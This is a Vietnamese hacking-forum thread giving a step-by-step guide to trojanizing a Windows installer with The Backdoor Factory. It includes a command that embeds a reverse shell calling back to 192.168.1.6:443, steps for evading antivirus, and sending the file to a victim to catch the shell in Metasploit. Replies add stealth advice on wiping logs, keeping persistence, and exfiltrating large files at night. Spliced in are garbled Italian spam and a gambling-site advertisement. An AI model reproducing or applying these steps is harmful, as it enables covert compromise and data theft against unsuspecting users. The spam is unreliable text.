Hack máy tính sử dụng một backdoor

DDos

VIP Members
22/10/2013
524
2.189 bài viết
Hack máy tính sử dụng một backdoor
The backdoor factory là một shellcode cho phép bạn tiêm vào bất kỳ một file thực thi chạy trên windows 32/64bit, mà file thực thi vẫn chạy bình thường. Công cụ này được viết bởi nhà nghiên cứu bảo mật Joshua Pitts được trình diễn tại hội nghị bảo mật Debycon 2013.

1699935865059.png

Các bạn có thể tìm hiểu thêm công cụ này trong slide mà tác giả đã chia sẻ:

HTML:
http://www.slideshare.net/midnite_runr/patching-windows-executables-with-the-backdoor-factory

Cách sử dụng công cụ:

Bước 1: Tải công cụ và giải nén ta được:

1490892970Screenshot from 2013-12-25 00:31:56.png

HTML:
https://github.com/secretsquirrel/the-backdoor-factory/archive/1af848015c49a0654bbae721388edf426ca80eda.zip

Bước 2: Mở terminal và chạy ứng dụng bằng lệnh: ./backdoor.py

1490892970Screenshot from 2013-12-25 00:34:53.png

Các tùy chọn của công cụ

Trong ví dụ này, mình sẽ gắn backdoor vào file cài đặt của phần mềm phân chia ổ đĩa khá nổi tiếng là EaseUS Partition Master Home Edition.

Bước 3: Mình sử dụng lệnh: ./backdoor.py -f '/root/Downloads/bypass antivirus/backdoor/epm.exe' -H 192.168.1.6 -P 443 -s reverse_shell_tcp


1490892970Screenshot from 2013-12-25 00:53:55.png

Bước 4: Các bạn lựa chọn các tùy chọn cho việc thay đổi shellcode gắn vào file thực thi để vượt qua sự phát hiện phần mềm diệt virus

1490892970Screenshot from 2013-12-24 21:59:44.png


1490892970Screenshot from 2013-12-24 22:00:14.png


1490892970Screenshot from 2013-12-24 22:00:14.png

Bước 5: Sau khi hoàn thành các tùy chọn, file thực thi mà đã được nhúng backdoor sẽ được tạo ra ở đường dẫn
/backoor/backdoored


1490892970Screenshot from 2013-12-24 22:00:25.png

Bước 6: Bây giờ mình sẽ thử scan file đã được backdoored này, sử dụng dịch vụ scan online Total virus. Và đây là kết quả:

1490892970Screenshot from 2013-12-24 22:03:07.png

Bước 7: Mình mở metasploit và sử dụng tạo khai thác exploit/multi/hanlder để lắng nghe kết nối từ nạn nhân. Sau đó mình sẽ gửi file thực thi này đến cho nạn nhân. Trên máy nạn nhân, có sử dụng phần mềm diệt virus AVG 2014 Free đã update đầy đủ cơ sở dữ liệu.

1490892970Screenshot from 2013-12-24 22:10:23.png

Bước 8: Khi nạn nhân thực thi file, quá trình khai thác của bạn đã thành công:

1490892970Screenshot from 2013-12-24 22:48:21.png

 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Re: Hack máy tính sử dụng một backdoor

Đã có phiên bản 1.1. Bản này hỗ trợ Win64 Stager added.
Một công cụ cực kỳ hay, anh em nên tìm hiểu và thử nghiệm.... ;)
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Hack máy tính sử dụng một backdoor

sau khi đã khai thác thành công thì phải làm gì nữa để điều khiển dc máy victim thế a Ddos
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Hack máy tính sử dụng một backdoor

Đối với một hacker, công việc thường làm sau khi khai thác thành công là cài backdoor trên hệ thống để tiện truy cập cho lần sau. Tiếp đến vô hiệu hóa phần mềm diệt virus. Thu thập thông tin người dùng.....
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Hack máy tính sử dụng một backdoor

DDos;11338 đã viết:
Đối với một hacker, công việc thường làm sau khi khai thác thành công là cài backdoor trên hệ thống để tiện truy cập cho lần sau. Tiếp đến vô hiệu hóa phần mềm diệt virus. Thu thập thông tin người dùng.....

Im lặng mà cắn lâu dài ... vô phá cái anti vir thì thọt rồi, SYSADMIN vô thấy hỏng cái anti vir thì việc đầu tiên là check virus dùng sysinternal suite check signature, check thêm phát virtotal nữa là thọt mất ngay. Cách tốt nhất sau khi vào thành công xóa log, gài hàng, giữ nguyên hiện trường hiện trạng cũ của màn hình desktop làm việc rồi lẳng lặng âm thầm mà đi. Nếu có file dung lượng lớn có giá trị thì vô gài hàng rồi lượn ngay ... 2-3h sáng mò lên mà down về
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
low-cost
whitehat.vn

ripetizione on iPhone Le cose che mentre si utilizza l'iPod. Cominciano inizio e\r\rquindi seguire riguardo seguente rcent nuovo Informazioni. iPhone di Apple it possde t:1 uno. Ristrutturazione Waves\r\r\rÂ*Apple sono\r louboutin milanoBasti dire che ho davvero genuinamente come Mary Sean Young. Ho visto notato Sean ubriaco, I vedere Sean sobrio, e buona favore sobrio, accetto e ammiro Sean Young qualunque momento e in tutte le condizioni . t ass calci soap opera sul giovani e l' Restless, e ora lei va sul pattinaggio Con tutto il STARS. Io porterò la conservazione russicitÃ* come ho sempre normalmente, anche nella parte posteriore quando il ghiaccio era molto considerevolmente più sottile e molti t sono stati applausi.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Hack máy tính sử dụng một backdoor

Udate version 2.2.3:

- Hỗ trợ Windows PE 32/64 bit, Linux ELF 32/64 bit
- Thêm shellcode win86 : loadliba_reverse_tcp

Download:
http://flexydrive.com/wvuax0qw14ye
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Hack máy tính sử dụng một backdoor

:p rất có kinh nghiệm
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Hack máy tính sử dụng một backdoor

:p Bác Phanonra rất có kinh nghiệm, hjhj
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
World Cup 2014 tại Brazil đã KẾT THÚC rồi,bạn đã sở hữu 1 TÀI KHOẢN đề tự tay đặt cược mà không cần gọi bạn bè (bạn sẽ bị ăn lai) nhờ đá kèo dùm chửa?

Và chi cần ngồi 1 chổ,dùng Internet Banking là bạn có thể ĐK cá độ thành công.

Muốn đăng ký Cược thể thao,casino trực tuyến,poker...tại 188bet rất đơn giản.

CLICK VÀO ĐÂY:>>LINK ĐĂNG KÝ 188bet.com
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Hack máy tính sử dụng một backdoor

anh DDOS cho em xin lại link 2.2.3 với.
Tks anh nhiều!
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Hack máy tính sử dụng một backdoor

Cập nhật video... :)
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Link không down được, Ad check giúp link
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bên trên